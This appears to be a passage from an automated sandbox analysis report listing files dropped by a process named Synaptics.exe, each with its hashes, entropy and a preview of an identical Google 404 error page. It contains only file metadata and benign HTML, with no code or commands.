                                                                                                                                                                                        SHA-256:7932E2EA8BE5093FF56C58C84E2C42D2DA6178A357A6C35B01214535EAC7099E
                                                                                                                                                                                        SHA-512:64A5D79403BF2C5BF8F97BD579FC876D04B512D8A36F8BC8A2B050C65AA8A4BF5075A3C3293145669E3252B602A582873AC7ACD6DAF646A8ECA791A730CFFB14
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ecm+0U562hRkdMjArHHnrA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\YEI3JQF.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.261905380511429
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0M3qaISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+d3q+pAZewRDK4mW
                                                                                                                                                                                        MD5:2BB3C00E6546CC274FC9F319AF74F6AB
                                                                                                                                                                                        SHA1:2D64CDAE034FF0CB1DB90A3C0654A12FE0264711
                                                                                                                                                                                        SHA-256:2D647194119BB56784A67F73F9E7E5FC4DCDBDC22E1E8B95E5B2339B0F895D13
                                                                                                                                                                                        SHA-512:23B519B695528BFB2D9F7DEAB21DDAD2A2DA728E9F8F035794BC395986C46E6996AB3AAB3D3306F91636EE1E25C8CD75D6A224576DEE32E4BCBED4E770DBC68D
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BchcdzjHRleWkJ818NLkZg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\YOBvUwy.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.276963345485275
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0PASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+3+pAZewRDK4mW
                                                                                                                                                                                        MD5:281A03D32D8161BE76E96C586301F6E1
                                                                                                                                                                                        SHA1:B5A1EE87E38EF0397F749D91080A3264F94D4D05
                                                                                                                                                                                        SHA-256:0C898D9115F743FDC6297F9AC62C7FAF868B68F83E5F91F759A49596DB7F927E
                                                                                                                                                                                        SHA-512:4B8A6354D96033FF98F942A12AF6E725AD28FCC41F685FFE49D496F7B4A3247F46179DB5051FEE83B252A71F67AA9F098EAF4E7CB5809A1D4599E251D5AB3207
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yY3+KsJJ8vE3DRzg6rgjBQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\YiPOuTh.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.261287897248217
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0USU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+X+pAZewRDK4mW
                                                                                                                                                                                        MD5:7527156378EC0E0DE2B46B1721675108
                                                                                                                                                                                        SHA1:4FE07895735D5C7D8D6C8F464C3D74577B44AA37
                                                                                                                                                                                        SHA-256:547A862B66B12A71C65D189F742967134B0F6CC1168D0622B59B4D57F8CF495F
                                                                                                                                                                                        SHA-512:183BE488D89E8E927B27AC13441685A000761085A5C1CD180E874ABE748B6FABEDF7E96852C2E1031B5A1EE7AEF55E5396841575DA11EE48DE7B717A5EF1BFFC
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="l/3Eil49VjlUqOh7PszLZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Yq3okoF.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.272300777292891
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0qSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+p+pAZewRDK4mW
                                                                                                                                                                                        MD5:E87EAED50FEF7EE0388ECBECCA08CC02
                                                                                                                                                                                        SHA1:B53E76CDF04239B7981B7B6707E33A6A9D20BBFD
                                                                                                                                                                                        SHA-256:82717796393AFEF7299447433ED88F9D3FDA795752144E5772BE75E80DF550F1
                                                                                                                                                                                        SHA-512:5C3656830C45456E3834773EE41ABCDFCA910FA0174E67A44A7D6F282931110D209ECD51C402A8E1B434DDCEE2CE02C3EF7C1AF457EA88EAF784669EF819F301
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Z6HbF2Qxm8BlKUnQzB+JZg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\YzauQKY.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.25154501425119
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0beDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+eM+pAZewRDK4mW
                                                                                                                                                                                        MD5:0329C651B44CE607EAD35B71458AF90A
                                                                                                                                                                                        SHA1:B57C1B6EBFA60BA4F02F7D06D7AC2C789A7FBF3C
                                                                                                                                                                                        SHA-256:2CED69DB73BD67DEE8DE260563A821D9AA44D6AE4C84A6715CB7E6766B306580
                                                                                                                                                                                        SHA-512:563CF72702A9D7CDCE709A870A1CF2C436755050028278A3092F19E76F069F72D9584BA91408732AD738DBAD70018815DA25C46016BBA8EC127774E1FB6F9D36
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iy2nw5qLVwbSZ1Cl2Pvhiw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Z3BMu8Q.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.265783168248553
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0Y9SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+b+pAZewRDK4mW
                                                                                                                                                                                        MD5:B5F866B0C2CFCB4DA367B82FAC692263
                                                                                                                                                                                        SHA1:9EE40481456E77CE723A9F84EF10D12C41C30073
                                                                                                                                                                                        SHA-256:C9FCA188D8E8BBD301688563F79BE7B7D9F43FD86842EC31717D7282E696BA3B
                                                                                                                                                                                        SHA-512:4B681CE311413F974AFBB51688DFC84988B63A53C963A965D9C58529F716E17DBE356DAB73AA7AC0F5606BE7B5D2048CFDDAE644C6DD168839BE9ABEC4F7EE7E
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9RSStggPGa2YP+/qGRxjDw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Z5pYaZ2.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2538295148232566
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0sZJSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+l+pAZewRDK4mW
                                                                                                                                                                                        MD5:0F5E0456E3C1CA20C8D787DA3C172589
                                                                                                                                                                                        SHA1:39C77DE4E079AF3109279CDA63D965B8A1015376
                                                                                                                                                                                        SHA-256:9EEC8B902C245AD68ADB0FAF576085D16659820B246E450C4745057EB226E2BF
                                                                                                                                                                                        SHA-512:B6A9A001721279FBDD49096C8972F1D7E08047EEC1BCD1E216456C8B128B57C2A5AE598F50A4854EEEA5C4392267DFD42CBED4F66BB307E66AE61A18AEB3FEA6
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aa5pi5+IatVGJG5rVPV+xw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Z7vkZEs.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.252754701034341
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0dduSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+5+pAZewRDK4mW
                                                                                                                                                                                        MD5:22806E4C3453759F1B6AB17BE39DF10D
                                                                                                                                                                                        SHA1:581B6829684EFC3AE395531C32D7E9890E109C8F
                                                                                                                                                                                        SHA-256:A2C276E1DE04BEEAACCA074928637714C44ADD9903AA3BC0DEBF8229EBDDF284
                                                                                                                                                                                        SHA-512:0B718673AEEC4FCC418183097090FEF211DBD0FAAC0DBAAA5F67E83EE5272AD4C577A21A966E88859A0741CDC08CE170012C8E0D54F253BB9EAC64D5CE7AD4E9
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yH+BoZdcnNgEXdpNIa114g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ZJmvrKh.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.244784555744773
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0NwSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Z+pAZewRDK4mW
                                                                                                                                                                                        MD5:7B2F9451E9F33339247184D984DCF922
                                                                                                                                                                                        SHA1:683482CDBE1DF63F6CB74424009A9690F7D9FEF6
                                                                                                                                                                                        SHA-256:CD9D827B441216AB4067463E92D93270A83C6D3412D07FD28577E08FDA5BB261
                                                                                                                                                                                        SHA-512:18F88151A8BF5979E17231CEC6086EA4E795932C327263C424427A7B6C8C41964FA8E8A7607BAC28D0BCAEF4B0369CBEF54D084729B5295685721776A24179BA
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="L1kpiOENrpy4pb3c8K4rag">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Ztopq77.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.262160497275548
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0zPXDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+sz+pAZewRDK4mW
                                                                                                                                                                                        MD5:7DE924833F2F7C285FF9899034F5C019
                                                                                                                                                                                        SHA1:0FCA8998F2CB37888D09091DC2250301AF899A7F
                                                                                                                                                                                        SHA-256:AC4D474D100CEE65F0C793AA19B2B51E450595DC68F4A94E26DD0FB07831387E
                                                                                                                                                                                        SHA-512:EA82D30F03511000FD5F70EEABBBFAAB1801B56A9E37B0B74A18D8AB8DD4819C4688907BC96E998A7E9258DAC65278D4C32AD865EA5C49BFE5AD85EA8DF30777
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="/L3+dDgu97IuIFVMl/LpCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\a18ENQr.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.25887580679754
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0B3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK++3+pAZewRDK4mW
                                                                                                                                                                                        MD5:1A6A018C2B9916024F7D6B9BD4D21E37
                                                                                                                                                                                        SHA1:9E7FB2EC646CAFD713E41257C669F00699770E86
                                                                                                                                                                                        SHA-256:AD063FCD3460EA081E7183867B7194499272FE38A127DD18E75E861823FABE92
                                                                                                                                                                                        SHA-512:7D726DB1D673CE87589F8FD68933302E7E55645FA8C990143560644669ECA3A7309881C57D3517D992313DBD4F7B3EABA1DBE4DE354186E4FA2A73CD717EC154
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6wWRm11GrFb/XMgJrNHp8w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\aHjO8hM.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.265035041446593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0SSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+5+pAZewRDK4mW
                                                                                                                                                                                        MD5:48FA4AC5CCF1DD75D86BBA7591A2AC38
                                                                                                                                                                                        SHA1:05437A252B435903A322DD53471F21D10BF64254
                                                                                                                                                                                        SHA-256:58030FEFBFE6C77F7B41C46AC2E77554039190E953EF94A6EB0583A5F59D82C3
                                                                                                                                                                                        SHA-512:EDC623BF4D63D12198775456FDE598113A61D1A307605744FA015AE0AF97A95C244B7CB5FDE27F0F7C21514A9953899A4FFCBD1E75771C82E9FB9773402855BB
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QybYb4Yii4LWSkLbIS5OQw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\aSMgPkQ.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.263519388604536
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+09HrSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+OL+pAZewRDK4mW
                                                                                                                                                                                        MD5:E0B49953ED45B12DD0A2445CB98E098D
                                                                                                                                                                                        SHA1:56CCA31CC7C7D0F59E054E884E1EE850AAD9EB15
                                                                                                                                                                                        SHA-256:81B0D19A5EEFE607CB27661295BEC7E66D5B94B0EB912DFFABDEC45B8FAD4369
                                                                                                                                                                                        SHA-512:EAEB2767DF30BF7A8D55A0C666E75C29ED15859C2EF23AB818804EF6438A27B2CA13FDF6AF910F96A86872490B23A339CD645A26C3E3CDA642C0F24912D623B4
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wqHRaL58gE0jZ6nIaLJfIg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\b1xZ5n7.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.25463618200573
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+08JSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+r+pAZewRDK4mW
                                                                                                                                                                                        MD5:6CC7A514E3B7C5ACF1F40FEE73D8CC19
